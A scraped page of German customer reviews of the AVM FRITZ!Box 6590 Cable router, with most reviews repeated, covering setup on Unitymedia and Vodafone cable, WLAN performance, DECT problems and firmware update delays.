    +++an für sich ist diese box eine echte fritzbox wie ich es beim kauf erwartet habe. Die bereits gewohnte oberfläche und die einrichtung sind kinderleicht und wirklich gut gemacht. Auch die einrichtung am kabelnetz (unitymedia) verlief schnell (bis auf die wartezeit in der unity-hotline) und problemlos. —was mich jedoch massiv stört ist: ich habe diese neuste kabelbox gekauft um unabhängig von den boxen der kabelnetzbetreiber zu sein, gerade softwareupdates und alle funktionen der box sollten freigeschaltet sein. Das sind sie auch, jedoch wird diese box im vergleich zu dem flagschiff von avm, welches unmerklich teurer ist, weitaus später mit den aktuellen softwareständen bedient. Seit mehreren monaten wirbt avm schon mit mesh netzwerken, welche in verbindung mit den anderen repeatern im haus den aufbau eines einzigen großen netzwerkes zulässt. Dieses update ist jedoch bei meiner box (6590) noch immer nicht verfügbar. Vielleicht ist der bereich der kabelrouterkunden im vergleich zu den telekomkunden noch zu gering, als das dieser kundenstamm annähernd zeitgleich updates erhält?. Mit dieser serviceleistung von avm ist meine erwartungshaltung an updates nicht erfüllt worden. Im nach hinein hätte ich vielleicht mit dem router von unitymedia weiter leben sollen und mir dahinter die 7590 verbauen sollen (was mir widerstrebt hat, einen roter hinter einen roter zu bauen).
  7. Rezension bezieht sich auf : AVM FRITZ!Box 6590 Cable WLAN AC + N Router (DOCSIS-3.0-Kabelmodem, Dual-WLAN AC+N mit 1.733 Mbit/s (5 GHz) + 800 MBit/s (2,4 GHz), VoIP-Telefonanlage)

    +++an für sich ist diese box eine echte fritzbox wie ich es beim kauf erwartet habe. Die bereits gewohnte oberfläche und die einrichtung sind kinderleicht und wirklich gut gemacht. Auch die einrichtung am kabelnetz (unitymedia) verlief schnell (bis auf die wartezeit in der unity-hotline) und problemlos. —was mich jedoch massiv stört ist: ich habe diese neuste kabelbox gekauft um unabhängig von den boxen der kabelnetzbetreiber zu sein, gerade softwareupdates und alle funktionen der box sollten freigeschaltet sein. Das sind sie auch, jedoch wird diese box im vergleich zu dem flagschiff von avm, welches unmerklich teurer ist, weitaus später mit den aktuellen softwareständen bedient. Seit mehreren monaten wirbt avm schon mit mesh netzwerken, welche in verbindung mit den anderen repeatern im haus den aufbau eines einzigen großen netzwerkes zulässt. Dieses update ist jedoch bei meiner box (6590) noch immer nicht verfügbar. Vielleicht ist der bereich der kabelrouterkunden im vergleich zu den telekomkunden noch zu gering, als das dieser kundenstamm annähernd zeitgleich updates erhält?. Mit dieser serviceleistung von avm ist meine erwartungshaltung an updates nicht erfüllt worden. Im nach hinein hätte ich vielleicht mit dem router von unitymedia weiter leben sollen und mir dahinter die 7590 verbauen sollen (was mir widerstrebt hat, einen roter hinter einen roter zu bauen).
  8. Rezension bezieht sich auf : AVM FRITZ!Box 6590 Cable WLAN AC + N Router (DOCSIS-3.0-Kabelmodem, Dual-WLAN AC+N mit 1.733 Mbit/s (5 GHz) + 800 MBit/s (2,4 GHz), VoIP-Telefonanlage)

    Der kauf hat sich wirklich gelohntich habe jahrelang die 6490 in betrieb gehabt. Mich nervten schon immer die abgespeckte software und die recht schwache hardware. Als immer mehr geräte (kinder werden älter) angeschafft wurden, war die netzwerk- bzw. Wlan leistung alles andere als akzeptabel. Die 6590 bestellt, von vodafone den aktivierungscode bekommen und angeschlossen. Die installation war recht schnell abgeschlossen, obwohl das 6490 backup nicht hergenommen werden könnte, und es wurde gleich getestet. Dect funktioniert einwandfrei und die box ist endlich software- und hardwareseitig so wie ich es mir vorstelle. Was ich nicht geglaubt habe und positiv überrascht wurde, ich habe endlich ein schnelles wlan auf allen gerätengleich den großen repeater bestellt und jetzt kann ich mit fast 200 mbps im garten surfender umstieg auf die 6590 hat sich wirklich gelohnt und ich bereue den kauf keine sekunde.
    1. Der kauf hat sich wirklich gelohntich habe jahrelang die 6490 in betrieb gehabt. Mich nervten schon immer die abgespeckte software und die recht schwache hardware. Als immer mehr geräte (kinder werden älter) angeschafft wurden, war die netzwerk- bzw. Wlan leistung alles andere als akzeptabel. Die 6590 bestellt, von vodafone den aktivierungscode bekommen und angeschlossen. Die installation war recht schnell abgeschlossen, obwohl das 6490 backup nicht hergenommen werden könnte, und es wurde gleich getestet. Dect funktioniert einwandfrei und die box ist endlich software- und hardwareseitig so wie ich es mir vorstelle. Was ich nicht geglaubt habe und positiv überrascht wurde, ich habe endlich ein schnelles wlan auf allen gerätengleich den großen repeater bestellt und jetzt kann ich mit fast 200 mbps im garten surfender umstieg auf die 6590 hat sich wirklich gelohnt und ich bereue den kauf keine sekunde.
  9. Rezension bezieht sich auf : AVM FRITZ!Box 6590 Cable WLAN AC + N Router (DOCSIS-3.0-Kabelmodem, Dual-WLAN AC+N mit 1.733 Mbit/s (5 GHz) + 800 MBit/s (2,4 GHz), VoIP-Telefonanlage)

    Von der schnelligkeit her und einstellungen die man vornehmen kann, top. Einzig das w-lan ist schlecht. Hatte gehofft mit einer eigenen fritzbox die leistung gegenüber der connect box (unitymedia) zu verbessern. Reichweite des w-lan ist schlechter. So ein riesen teil, gleicher aufstellort, mehr antennen intern und und und. Mal sehen wie sich das längerfristig verhält.
    1. Von der schnelligkeit her und einstellungen die man vornehmen kann, top. Einzig das w-lan ist schlecht. Hatte gehofft mit einer eigenen fritzbox die leistung gegenüber der connect box (unitymedia) zu verbessern. Reichweite des w-lan ist schlechter. So ein riesen teil, gleicher aufstellort, mehr antennen intern und und und. Mal sehen wie sich das längerfristig verhält.
  10. Rezension bezieht sich auf : AVM FRITZ!Box 6590 Cable WLAN AC + N Router (DOCSIS-3.0-Kabelmodem, Dual-WLAN AC+N mit 1.733 Mbit/s (5 GHz) + 800 MBit/s (2,4 GHz), VoIP-Telefonanlage)

    Genau so, wie ich es von avm kenne und erwarte. Endlich ist der unübersichtliche, alte kabel router von vodafone weg.
    1. Genau so, wie ich es von avm kenne und erwarte. Endlich ist der unübersichtliche, alte kabel router von vodafone weg.
      1. Seit knapp vier monaten “kämpfe” ich mit einem mir von vodafone überlassenen wlan-kabelrouter – der immer wieder einmal “aussetzer” hatte und ich mir irgendwann nicht mehr sicher sein konnte, ob ich auch wirklich alle anrufe erhalten habe oder nicht. Da ich aber nicht wieder stundenlang mit dem kundencenter von vodafone telefonieren wollte. . Der preis der fritzbox hat mich erst ein wenig zögern lassen, aber jetzt bin ich sehr zufriedenmit der kurzanleitung war die box innerhalb weniger minuten angeschlossen und nachdem ich mein equipment mit den neuen daten angemeldet hatte, war ich auch wieder ans internet angeschlossen. Die telefonie funktioniert einwandfrei. Da ich sehr dicke wände habe, war ich ein wenig skeptisch ob wlan gut funktionieren würde, aber auch hier war meine sorge unbegründet. Werde mich in der nächsten zeit mit den einzelnen funktionen der box vertraut machen und nachdem was ich bisher gelesen habe, soll sie eine grosse funktionalität besitzen, die ich noch gar nicht ausgeschöpft habe. Also bisher bin ich überglücklich.
  11. Rezension bezieht sich auf : AVM FRITZ!Box 6590 Cable WLAN AC + N Router (DOCSIS-3.0-Kabelmodem, Dual-WLAN AC+N mit 1.733 Mbit/s (5 GHz) + 800 MBit/s (2,4 GHz), VoIP-Telefonanlage)

    Seit knapp vier monaten “kämpfe” ich mit einem mir von vodafone überlassenen wlan-kabelrouter – der immer wieder einmal “aussetzer” hatte und ich mir irgendwann nicht mehr sicher sein konnte, ob ich auch wirklich alle anrufe erhalten habe oder nicht. Da ich aber nicht wieder stundenlang mit dem kundencenter von vodafone telefonieren wollte. . Der preis der fritzbox hat mich erst ein wenig zögern lassen, aber jetzt bin ich sehr zufriedenmit der kurzanleitung war die box innerhalb weniger minuten angeschlossen und nachdem ich mein equipment mit den neuen daten angemeldet hatte, war ich auch wieder ans internet angeschlossen. Die telefonie funktioniert einwandfrei. Da ich sehr dicke wände habe, war ich ein wenig skeptisch ob wlan gut funktionieren würde, aber auch hier war meine sorge unbegründet. Werde mich in der nächsten zeit mit den einzelnen funktionen der box vertraut machen und nachdem was ich bisher gelesen habe, soll sie eine grosse funktionalität besitzen, die ich noch gar nicht ausgeschöpft habe. Also bisher bin ich überglücklich.
    1. Kabelmodem mit nachgeschaltetem wlan-router durch avm fritzbox 6590 cable ersetzt- volle leistung, super funktionen- fritzbox eben. Läuft am kabel deutschland/ vodafon kabelanschluss.
  12. Rezension bezieht sich auf : AVM FRITZ!Box 6590 Cable WLAN AC + N Router (DOCSIS-3.0-Kabelmodem, Dual-WLAN AC+N mit 1.733 Mbit/s (5 GHz) + 800 MBit/s (2,4 GHz), VoIP-Telefonanlage)

    Kabelmodem mit nachgeschaltetem wlan-router durch avm fritzbox 6590 cable ersetzt- volle leistung, super funktionen- fritzbox eben. Läuft am kabel deutschland/ vodafon kabelanschluss.
    1. Kann die negativen rezensionen hier in keinster weise nachvollziehen, habe nichts zu beanstanden. Habe mir das gerät kurz nach dem es auf dem markt war gekauft und es gegen meine vom kabelprovider gemietete 6490 ausgetauscht, da zum einem die firmware um wichtige funktionen beschnitten ist, und keine aktuellen firmwares mehr veröffentlicht wurden. Dns-einstellungen sind jetzt verfügbar und einige andere wichtige funktionen. Größter vorteil ist, dass man die aktuellste firmware nutzen kann und nicht auf den provider angewiesen ist. Die einrichtung verlief schnell und problemlos. Ist alles selbsterklärend auf der avm-webseite erklärt. Was mir gleich auffiel, dass die box lange nicht so warm wird, wie die 6490. Die 6490 wurde mitunter ziemlich heiß, daher auch hier das größere gehäuse. Klein ist daher nicht immer gleich gut. Meiner meinung nach ein erstklassiges design, welches für ein durchweg kühles gerät sorgt.
  13. Rezension bezieht sich auf : AVM FRITZ!Box 6590 Cable WLAN AC + N Router (DOCSIS-3.0-Kabelmodem, Dual-WLAN AC+N mit 1.733 Mbit/s (5 GHz) + 800 MBit/s (2,4 GHz), VoIP-Telefonanlage)

    Kann die negativen rezensionen hier in keinster weise nachvollziehen, habe nichts zu beanstanden. Habe mir das gerät kurz nach dem es auf dem markt war gekauft und es gegen meine vom kabelprovider gemietete 6490 ausgetauscht, da zum einem die firmware um wichtige funktionen beschnitten ist, und keine aktuellen firmwares mehr veröffentlicht wurden. Dns-einstellungen sind jetzt verfügbar und einige andere wichtige funktionen. Größter vorteil ist, dass man die aktuellste firmware nutzen kann und nicht auf den provider angewiesen ist. Die einrichtung verlief schnell und problemlos. Ist alles selbsterklärend auf der avm-webseite erklärt. Was mir gleich auffiel, dass die box lange nicht so warm wird, wie die 6490. Die 6490 wurde mitunter ziemlich heiß, daher auch hier das größere gehäuse. Klein ist daher nicht immer gleich gut. Meiner meinung nach ein erstklassiges design, welches für ein durchweg kühles gerät sorgt.
  14. Rezension bezieht sich auf : AVM FRITZ!Box 6590 Cable WLAN AC + N Router (DOCSIS-3.0-Kabelmodem, Dual-WLAN AC+N mit 1.733 Mbit/s (5 GHz) + 800 MBit/s (2,4 GHz), VoIP-Telefonanlage)

    Nachdem meine 6490 immer wieder probleme machte in sachen telefonie und auch sonst so manchen internetausfall durchlebt hatte, ging sie an amazon zuzrück – ich kann mich an dieser stelle nur nochmal bei amazon für die kulanz bedankendie 6590 kam postwendend, wenngleich hermes den garantierten liefertermin nicht halten konnte – passiert nunmal. Die 6590 ist im vergleich zur 6490 ein wahrer schrank – ich vermute, das aufrechte design kommt der belüftung zugute. Die einrichtung ist avm standard. Habe meinem provider die cm mac und alle anderen relevanten daten vorab gemailt und nach einbindung der 6590 in der kopfstelle, konnte sie just angeschlossen werden. Wlan geräte und telefoniegeräte waren schnell eingebunden und registriert. Zwei dect telefone direkt an die fb und ein weiteres über tae – dazu kam noch ein fax (dazu musste ich den fon2 löschen und neu als fax anlegen – gekoppelt über rj11 – hp officejet 4620 und fb 6590). Weil das aktuelle fritzos 6. 90 nicht für die 6590 zu haben ist, sondern erst 6. 87 (was bei inbetriebnahme sogleich gezogen wurde) und ich erst vorsichtig abwarte, ob nun wirklich alles funktioniert – dann gibts auch ein sterne-upgrade.
    1. Nachdem meine 6490 immer wieder probleme machte in sachen telefonie und auch sonst so manchen internetausfall durchlebt hatte, ging sie an amazon zuzrück – ich kann mich an dieser stelle nur nochmal bei amazon für die kulanz bedankendie 6590 kam postwendend, wenngleich hermes den garantierten liefertermin nicht halten konnte – passiert nunmal. Die 6590 ist im vergleich zur 6490 ein wahrer schrank – ich vermute, das aufrechte design kommt der belüftung zugute. Die einrichtung ist avm standard. Habe meinem provider die cm mac und alle anderen relevanten daten vorab gemailt und nach einbindung der 6590 in der kopfstelle, konnte sie just angeschlossen werden. Wlan geräte und telefoniegeräte waren schnell eingebunden und registriert. Zwei dect telefone direkt an die fb und ein weiteres über tae – dazu kam noch ein fax (dazu musste ich den fon2 löschen und neu als fax anlegen – gekoppelt über rj11 – hp officejet 4620 und fb 6590). Weil das aktuelle fritzos 6. 90 nicht für die 6590 zu haben ist, sondern erst 6. 87 (was bei inbetriebnahme sogleich gezogen wurde) und ich erst vorsichtig abwarte, ob nun wirklich alles funktioniert – dann gibts auch ein sterne-upgrade.
  15. Rezension bezieht sich auf : AVM FRITZ!Box 6590 Cable WLAN AC + N Router (DOCSIS-3.0-Kabelmodem, Dual-WLAN AC+N mit 1.733 Mbit/s (5 GHz) + 800 MBit/s (2,4 GHz), VoIP-Telefonanlage)

    Ich hatte bisher einen router von thomson, da war ich nicht gerade verwöhnt von der software. Jetzt hat man dazu einen app, kann das ganze haus überwachen, kann jedem gast eine eigene ip adresse zuordnen. Die einrichtung der fritzbox war super schnell. Ist jetzt ein monat im einsatz und ich bin einfach nur begeistert wie stabil internet sein kann.
    1. Ich hatte bisher einen router von thomson, da war ich nicht gerade verwöhnt von der software. Jetzt hat man dazu einen app, kann das ganze haus überwachen, kann jedem gast eine eigene ip adresse zuordnen. Die einrichtung der fritzbox war super schnell. Ist jetzt ein monat im einsatz und ich bin einfach nur begeistert wie stabil internet sein kann.
  16. Rezension bezieht sich auf : AVM FRITZ!Box 6590 Cable WLAN AC + N Router (DOCSIS-3.0-Kabelmodem, Dual-WLAN AC+N mit 1.733 Mbit/s (5 GHz) + 800 MBit/s (2,4 GHz), VoIP-Telefonanlage)

    Da vodafone kein sw-update für die 6490 liefert, habe ich mich nach langem zögern zu dem invest entschlossen. Die vodafone box liegt jetzt nutzlos im keller, das sie nicht mal als wlan accesspoint nutzbar ist. Das positive ist, all meine probleme mit dect telefonie und wlan stabilität und geschwindigkeit sind gelöst. All meine avm geräte haben jetzt einen aktuellen sw-stand, und arbeiten perfekt zusammen. Am ende hat es sich gelohnt, auch wenn es ein armutszeugnis für vodafone ist. Regelmäßige updates seitens vodafone hätten mir zeit und geld sparen können. Von mir eine klare kaufempfehlung für einen freien kabel-router.
    1. Da vodafone kein sw-update für die 6490 liefert, habe ich mich nach langem zögern zu dem invest entschlossen. Die vodafone box liegt jetzt nutzlos im keller, das sie nicht mal als wlan accesspoint nutzbar ist. Das positive ist, all meine probleme mit dect telefonie und wlan stabilität und geschwindigkeit sind gelöst. All meine avm geräte haben jetzt einen aktuellen sw-stand, und arbeiten perfekt zusammen. Am ende hat es sich gelohnt, auch wenn es ein armutszeugnis für vodafone ist. Regelmäßige updates seitens vodafone hätten mir zeit und geld sparen können. Von mir eine klare kaufempfehlung für einen freien kabel-router.
  17. Rezension bezieht sich auf : AVM FRITZ!Box 6590 Cable WLAN AC + N Router (DOCSIS-3.0-Kabelmodem, Dual-WLAN AC+N mit 1.733 Mbit/s (5 GHz) + 800 MBit/s (2,4 GHz), VoIP-Telefonanlage)

    Für mich ist der preis nicht gerechtfertigtda die cable 6490 für das heutige angebot( 500 mbit)bei kabel deutschland bzw vodafone voll ausreichend ist bekomme auf dem handy vollen download und upload. 0 und die 400 mbit was sie mehr leistung hat als die 6490 merkt man ja eh nichtlieber etwas warten und dann kaufen. Weil jemand der 500 mbit leitung hat kriegt auch nur 500 mbit und es ist wichtig das die mit verschlüsselung auch auf dem jeweiligen gerät landenund das ist so bei der 6490.Sonst hätte kabel deutschland schon die neue im programm. Für mich noch ungenutztes potenzialda beide docsis3. 0 haben und 32 kanäle geht einfach mal auf den vergleich da stehen dann 1300mbit (5ghz)gegen 1700mbit ?das ist toll wenn es mal schnelleres internet hat im moment für mich keine alternative zur 6490. S wer braucht schon mehr als 500 mbit???p. Möchte aber nicht behaupten das die box schlecht ist,nur das preis leistungsverhältnis und der mehrwert fehlt mir.
  18. Rezension bezieht sich auf : AVM FRITZ!Box 6590 Cable WLAN AC + N Router (DOCSIS-3.0-Kabelmodem, Dual-WLAN AC+N mit 1.733 Mbit/s (5 GHz) + 800 MBit/s (2,4 GHz), VoIP-Telefonanlage)

    Für mich ist der preis nicht gerechtfertigtda die cable 6490 für das heutige angebot( 500 mbit)bei kabel deutschland bzw vodafone voll ausreichend ist bekomme auf dem handy vollen download und upload. 0 und die 400 mbit was sie mehr leistung hat als die 6490 merkt man ja eh nichtlieber etwas warten und dann kaufen. Weil jemand der 500 mbit leitung hat kriegt auch nur 500 mbit und es ist wichtig das die mit verschlüsselung auch auf dem jeweiligen gerät landenund das ist so bei der 6490.Sonst hätte kabel deutschland schon die neue im programm. Für mich noch ungenutztes potenzialda beide docsis3. 0 haben und 32 kanäle geht einfach mal auf den vergleich da stehen dann 1300mbit (5ghz)gegen 1700mbit ?das ist toll wenn es mal schnelleres internet hat im moment für mich keine alternative zur 6490. S wer braucht schon mehr als 500 mbit???p. Möchte aber nicht behaupten das die box schlecht ist,nur das preis leistungsverhältnis und der mehrwert fehlt mir.
    1.  da ich einen kabelanschluss über unitymedia bw habe und die connect box im bereich smart home nichts kann, kam jetzt eine fritzbox her. Die weiße fritzbox wird hochkant aufgestellt und hat auf der rückseite einige anschlüsse. Da wären 4x lan die jeweils separat in einen stromsparenden 100 mbit modus geschaltet werden können. Zusätzlich gibt es zweimal usb, die aber leider nur usb 2. 0 unterstützen, was gerade für eine nutzung als nas zu langsam ist. Sollte man hier mehr benötigen muss man auf die 6591 warten die ganz aktuell angekündigt wurde. An der front sind zwei knöpfe. Einer für die kopplung von dect geräten wie schnurlosen telefonen und den smart home geräten von avm. Der andere ist ein üblicher wps knopf zur einfachen kopplung von neuen wlan geräten. Die kopplung mit den fritz eigenen smart home geräten (z.
  19. Rezension bezieht sich auf : AVM FRITZ!Box 6590 Cable WLAN AC + N Router (DOCSIS-3.0-Kabelmodem, Dual-WLAN AC+N mit 1.733 Mbit/s (5 GHz) + 800 MBit/s (2,4 GHz), VoIP-Telefonanlage)

     da ich einen kabelanschluss über unitymedia bw habe und die connect box im bereich smart home nichts kann, kam jetzt eine fritzbox her. Die weiße fritzbox wird hochkant aufgestellt und hat auf der rückseite einige anschlüsse. Da wären 4x lan die jeweils separat in einen stromsparenden 100 mbit modus geschaltet werden können. Zusätzlich gibt es zweimal usb, die aber leider nur usb 2. 0 unterstützen, was gerade für eine nutzung als nas zu langsam ist. Sollte man hier mehr benötigen muss man auf die 6591 warten die ganz aktuell angekündigt wurde. An der front sind zwei knöpfe. Einer für die kopplung von dect geräten wie schnurlosen telefonen und den smart home geräten von avm. Der andere ist ein üblicher wps knopf zur einfachen kopplung von neuen wlan geräten. Die kopplung mit den fritz eigenen smart home geräten (z.
    1. Das gerät ersetzt bei mir die connectbox von unitymedia. Die box ist – wie alle produkte von avm – sehr umweltfreundlich verpackt, 99% der verpackung können im altpapier entsorgt werden. Die box ist sehr schnell installiert, ich hatte gleichzeitig mehrere dect200 steckdosen und fritzfon c5 bestellt. Nach weniger als einer stunde hatte ich alles am laufen, inklusive warteschleife an der unitymedia service hotline zur anmeldung der fritzbox. Dinge wie einzelne ports öffnen, wenn man etwa eine eigene webseite oder einen tor-relay betreiben will, sind mit der durchdachten benutzeroberfläche ein kinderspiel. Toll ist die integration von dynamic dns; ich hatte vorher mit mamp pro, dyndns und ähnlichen herumgefrickelt; hat nicht funktioniert. Mit der fritzbox klappe es auf anhiebzwei nachteile, die meiner meinung nach in ihrer summe einen punktabzug rechtfertigen: zum einen bricht regelmäßig die dect-verbindung zu den geräten zusammen und kann in der regel nur durch einen neustart der box wieder hergestellt werden. Um ein entfernungsproblem kann es sich nicht handeln, da keines der dect-geräte mehr als 5 meter von der box bzw. Dem dect-repeater entfernt ist. Zum anderen wird, wenn die verbindung zum internet abbricht (was bei um durchaus das eine oder andere mal vorkommt), auch das interne dhcp zerschossen, so dass man etwa verbindungen zu internen netzlaufwerken verliert oder gerade laufende backups abbrechen.
  20. Rezension bezieht sich auf : AVM FRITZ!Box 6590 Cable WLAN AC + N Router (DOCSIS-3.0-Kabelmodem, Dual-WLAN AC+N mit 1.733 Mbit/s (5 GHz) + 800 MBit/s (2,4 GHz), VoIP-Telefonanlage)

    Das gerät ersetzt bei mir die connectbox von unitymedia. Die box ist – wie alle produkte von avm – sehr umweltfreundlich verpackt, 99% der verpackung können im altpapier entsorgt werden. Die box ist sehr schnell installiert, ich hatte gleichzeitig mehrere dect200 steckdosen und fritzfon c5 bestellt. Nach weniger als einer stunde hatte ich alles am laufen, inklusive warteschleife an der unitymedia service hotline zur anmeldung der fritzbox. Dinge wie einzelne ports öffnen, wenn man etwa eine eigene webseite oder einen tor-relay betreiben will, sind mit der durchdachten benutzeroberfläche ein kinderspiel. Toll ist die integration von dynamic dns; ich hatte vorher mit mamp pro, dyndns und ähnlichen herumgefrickelt; hat nicht funktioniert. Mit der fritzbox klappe es auf anhiebzwei nachteile, die meiner meinung nach in ihrer summe einen punktabzug rechtfertigen: zum einen bricht regelmäßig die dect-verbindung zu den geräten zusammen und kann in der regel nur durch einen neustart der box wieder hergestellt werden. Um ein entfernungsproblem kann es sich nicht handeln, da keines der dect-geräte mehr als 5 meter von der box bzw. Dem dect-repeater entfernt ist. Zum anderen wird, wenn die verbindung zum internet abbricht (was bei um durchaus das eine oder andere mal vorkommt), auch das interne dhcp zerschossen, so dass man etwa verbindungen zu internen netzlaufwerken verliert oder gerade laufende backups abbrechen.
    1. . Denn der funktionsumfang ist gegenüber dem vorgängermodell 6490 kaum verbessert worden. Zunächst vorweg: dies ist keine “verifizierter kauf”-rezension, da ich selbst eine 6490 habe und ich diese 6590 lediglich mal in der praxis bei meinem nachbarn “bestaunen” durfte, der ein echter technik-freak ist und diese “fritte” an einem 500er-anschluss betreibt (500 mbit dl, 50 mbit ul) und ich meine 6490 an einem 400er (400 mbit dl, 25 mbit ul). Vom design mal abgesehen (denn das ist geschmackssache) unterscheidet sich die 6590 technisch kaum von der deutlich günstigeren 6490. “deutlichere” unterschied liegt beim wlan, wobei dieser unterschied allerdings nur rein theoretischer natur ist und in der praxis für die meisten nutzer kaum vorteile bringt. Die “alte” 6490 bietet “nur” wlan bis 1,3 gbit mit 3×3 mu-mimo und diese 6590 bis 1,7 gbit mit 4×4 mu-mimo-funktion, wobei beide werte, wie schon erwähnt, eh nur rein akademischen wert besitzen. In der praxis schaffen beide “fritten” eh höchstens() knapp die hälfte – und das auch nur unter optimalen bedingungen, also direkter sichtkontakt zwischen den geräten und dann auch bitte nicht weiter als 2m voneinander entfernt – und eine ac-verbindung natürlich vorausgesetzt. Einzig die 4×4 mu-mimo-funktion könnte(?) einen vorteil bieten, wenn viele (also mehr als 5 oder 6) wlan-geräte-/verbindungen gleichzeitig() große datenmengen zu senden/empfangen haben, aber in welchem “otto-normalhaushalt” oder kleinunternehmen ist das schon der fall?diesen wlan-speedtest möchte ich an dieser stelle auch gerne mit zahlen untermauern: am pc mit einer lan-verbindung lagen laut test der webseite “speedtest. Net” im dl knapp 499 mbit an, im ul gut 49 mbit sowie ein ping von 9 ms. Dann haben wir diesen test auf der selben webseite mit 3 smartphones durchgeführt – natürlich jeweils nacheinander -, die via ac-wlan aus 1m entfernung mit der 6590 verbunden waren: samsung galaxy s8, samsung a5 2017 und iphone 8. Alle drei geräte kamen beim dl nicht über 150-200 mbit mit einem ping von 18-20 ms hinaus, obwohl sie laut wlan-status der 6590 mit 700-800 mbit mit der “fritte” verbunden waren. Im ul dagegen wurden auch mit den smartphones die fast 50 mbit erreicht. Ok, gegenüber dsl ist das natürlich noch immer “sauschnell”, aber es zeigt dennoch, dass eine wlan-verbindung in der praxis keinesfalls so flott ist, wie einem die hersteller das gerne verkaufen wollen. Kommen dann noch 2, 3 wände dazwischen, was in einem haus/einer wohnung ja keinesfalls ungewöhnlich ist, dann sinkt der dl-wert sogar auf unter 30 mbit.
      1. . Denn der funktionsumfang ist gegenüber dem vorgängermodell 6490 kaum verbessert worden. Zunächst vorweg: dies ist keine “verifizierter kauf”-rezension, da ich selbst eine 6490 habe und ich diese 6590 lediglich mal in der praxis bei meinem nachbarn “bestaunen” durfte, der ein echter technik-freak ist und diese “fritte” an einem 500er-anschluss betreibt (500 mbit dl, 50 mbit ul) und ich meine 6490 an einem 400er (400 mbit dl, 25 mbit ul). Vom design mal abgesehen (denn das ist geschmackssache) unterscheidet sich die 6590 technisch kaum von der deutlich günstigeren 6490. “deutlichere” unterschied liegt beim wlan, wobei dieser unterschied allerdings nur rein theoretischer natur ist und in der praxis für die meisten nutzer kaum vorteile bringt. Die “alte” 6490 bietet “nur” wlan bis 1,3 gbit mit 3×3 mu-mimo und diese 6590 bis 1,7 gbit mit 4×4 mu-mimo-funktion, wobei beide werte, wie schon erwähnt, eh nur rein akademischen wert besitzen. In der praxis schaffen beide “fritten” eh höchstens() knapp die hälfte – und das auch nur unter optimalen bedingungen, also direkter sichtkontakt zwischen den geräten und dann auch bitte nicht weiter als 2m voneinander entfernt – und eine ac-verbindung natürlich vorausgesetzt. Einzig die 4×4 mu-mimo-funktion könnte(?) einen vorteil bieten, wenn viele (also mehr als 5 oder 6) wlan-geräte-/verbindungen gleichzeitig() große datenmengen zu senden/empfangen haben, aber in welchem “otto-normalhaushalt” oder kleinunternehmen ist das schon der fall?diesen wlan-speedtest möchte ich an dieser stelle auch gerne mit zahlen untermauern: am pc mit einer lan-verbindung lagen laut test der webseite “speedtest. Net” im dl knapp 499 mbit an, im ul gut 49 mbit sowie ein ping von 9 ms. Dann haben wir diesen test auf der selben webseite mit 3 smartphones durchgeführt – natürlich jeweils nacheinander -, die via ac-wlan aus 1m entfernung mit der 6590 verbunden waren: samsung galaxy s8, samsung a5 2017 und iphone 8. Alle drei geräte kamen beim dl nicht über 150-200 mbit mit einem ping von 18-20 ms hinaus, obwohl sie laut wlan-status der 6590 mit 700-800 mbit mit der “fritte” verbunden waren. Im ul dagegen wurden auch mit den smartphones die fast 50 mbit erreicht. Ok, gegenüber dsl ist das natürlich noch immer “sauschnell”, aber es zeigt dennoch, dass eine wlan-verbindung in der praxis keinesfalls so flott ist, wie einem die hersteller das gerne verkaufen wollen. Kommen dann noch 2, 3 wände dazwischen, was in einem haus/einer wohnung ja keinesfalls ungewöhnlich ist, dann sinkt der dl-wert sogar auf unter 30 mbit.
  21. Ich hatte bislang eine kombination aus kabelmodem + profi-accesspoint (lancom 460agn) genutzt und war nicht so recht zufrieden. Das wlan hatte so seine “wehwechen”, die konfiguration des 460er war generell fordernd – und teilweise “bugged”. Als zum xten male dyndns nicht so wollte wie ich, hatte ich genug: etwas neues musste her. Ich hatte früher selbst mal ne fritze, und da ich bei bekannten oft damit arbeite, war mir die oberfläche und funktionsumfang geläufig. Und auch die probleme: zu wenig prozessorleistung für zu viele funktionennun sollte die neue 6590 aber mehr cpu-leistung haben und auch noch problemlos mit vodafone-kabel funktionieren?. Und ich habe es nicht bereut. Alles funktioniert wie gewünscht. 1) die grundlegende einrichtung hat nur wenige minuten gedauert – und die fritze wird sofort von vofo akzeptiert. 2) das modem der fritze scheint besser zu sein als das alte von vofo, da die geschwindigkeit nun tatsächlich ein paar % höher ist.
    1. Ich hatte bislang eine kombination aus kabelmodem + profi-accesspoint (lancom 460agn) genutzt und war nicht so recht zufrieden. Das wlan hatte so seine “wehwechen”, die konfiguration des 460er war generell fordernd – und teilweise “bugged”. Als zum xten male dyndns nicht so wollte wie ich, hatte ich genug: etwas neues musste her. Ich hatte früher selbst mal ne fritze, und da ich bei bekannten oft damit arbeite, war mir die oberfläche und funktionsumfang geläufig. Und auch die probleme: zu wenig prozessorleistung für zu viele funktionennun sollte die neue 6590 aber mehr cpu-leistung haben und auch noch problemlos mit vodafone-kabel funktionieren?. Und ich habe es nicht bereut. Alles funktioniert wie gewünscht. 1) die grundlegende einrichtung hat nur wenige minuten gedauert – und die fritze wird sofort von vofo akzeptiert. 2) das modem der fritze scheint besser zu sein als das alte von vofo, da die geschwindigkeit nun tatsächlich ein paar % höher ist.
      1. Warum habe ich mir die fritzbox 6590 cable gekauft und nicht die 6490 cable?. Ein punkt ist, dass die 6590 aktueller vom entwicklungsstand ist (schnelleres wlan, schnellere update- und downloads und schnelleren prozessor und wie ich finde endlich ein besseres geräte design. Ein weiterer punkt war die Überlegung, dass diese box für die nächsten jahre bei mir zu hause ihren dienst verrichten soll. Webhalb ich dann das aktuellste modell genommen habe. Was mir außerdem immer wieder aufgefallen ist, war bei der 6490 die erhebliche wärmeentwickkung. Das ist bei der 6590 nicht mehr der fall. Klar hätte ich auch mit der 6490 weiter glücklich werden können. Diese hatte ich fast zwei jahre über vodafone zu miete. Jetzt bekommt der router aber seit mehreren monaten keine software updates mehr von vodafone und steht immer noch auf software version 6. Aktuell veröffentlicht durch avm ist version 6. 85eigenständige software updates kann man als nutzer einer fritzbox 6490 von vodafone nicht machen. Also stand mein entschluss fest. 6490 bei vodafone kündigen. Und eine neue fritzbox bei amazon kaufen.
  22. Rezension bezieht sich auf : AVM FRITZ!Box 6590 Cable WLAN AC + N Router (DOCSIS-3.0-Kabelmodem, Dual-WLAN AC+N mit 1.733 Mbit/s (5 GHz) + 800 MBit/s (2,4 GHz), VoIP-Telefonanlage)

